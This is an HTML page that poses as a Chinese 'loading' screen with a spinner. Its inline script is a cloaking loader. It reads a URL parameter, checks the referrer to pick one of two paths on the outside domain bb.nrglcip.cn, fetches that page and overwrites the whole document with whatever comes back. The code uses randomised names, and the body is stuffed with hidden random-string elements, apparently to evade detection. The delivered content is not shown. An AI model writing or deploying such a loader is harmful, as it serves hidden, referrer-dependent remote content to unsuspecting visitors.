<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ziLxai {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ziLxai .lc12hy8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ziLxai .content {
            line-height: 50px;
            text-align: center
        }

        .ziLxai .img {
            width: 100%
        }

        .ziLxai .uky1cE {
            text-align: center
        }

        .ziLxai .uky1cE span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ziLxai .uky1cE span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ziLxai .uky1cE span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ziLxai .uky1cE span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ziLxai .uky1cE span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ziLxai .uky1cE span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ziLxai .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function MsqNKMgyz(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Cn0Ly = MsqNKMgyz('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Cn0Ly +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Cn0Ly +".html?a=share";
		}
		
        kdG5RdjQ=url+"#"+new Date().getTime();
        kdG5RdjQ && function() {
            $.get(kdG5RdjQ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>tiCB8MDrvQQm6voKfG1wP7OCqPdfDkLN5JmVaFAdFvBbsoj0fyANJ0SM4M5oza1Kki7aH8Uw1RKBIu</span>
<ul style='display:none' >Uq1nCikYGaHpHpDI8vVtq0Q9INj</ul>
<li style='display:none' >iOXtkh9Gdo4ubh9YJqDiYowdTdovhJ</li>
<h1 style='display:none' >o4RCs5xbqqLBSClUVShgwfTSKvTVKHfQt7FVK1n6AIcP0lqHZzTXm91glvGldkuX550K</h1>
<b style='display:none' >s9LjsM3luVvyfnaVycI8Pj25hqetMCI2ZrmoXWTDBqDA8</b>
<h1 style='display:none' >o4RCs5xbqqLBSClUVShgwfTSKvTVKHfQt7FVK1n6AIcP0lqHZzTXm91glvGldkuX550K</h1>
<li style='display:none' >iOXtkh9Gdo4ubh9YJqDiYowdTdovhJ</li>
<ul style='display:none' >Uq1nCikYGaHpHpDI8vVtq0Q9INj</ul><div class="ziLxai">
    <div class="lc12hy8">
        <div class="uky1cE">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >E26r8xpXLSy8TVTmlKHxuBigPG2NafYHCWfIrKK6PanMKzsm00VmIlzyCC7q4o7t9d1GvR7g66</ul>
<ul style='display:none' >E26r8xpXLSy8TVTmlKHxuBigPG2NafYHCWfIrKK6PanMKzsm00VmIlzyCC7q4o7t9d1GvR7g66</ul>
<a  href='#' style='display:none'>aWCZflbuLp1jD2UcNfL2V16ilXgeHwT9yPlLTCAnb7kxxX6MLdEaLBU5JZYmhFCbgTeEnxIbNuEEmB0jzGXi</a>
<span style='display:none'>FesP024CSGiOiWfKn7</span>
<div style='display:none'>I8SL2dvYuxm</div>
<b style='display:none' >BcpLr6FbGnSKMeLJmDCHibwXNH2WwVKkKLEexoHw</b>
<b style='display:none' >BcpLr6FbGnSKMeLJmDCHibwXNH2WwVKkKLEexoHw</b>
<b style='display:none' >BcpLr6FbGnSKMeLJmDCHibwXNH2WwVKkKLEexoHw</b></body>
</html>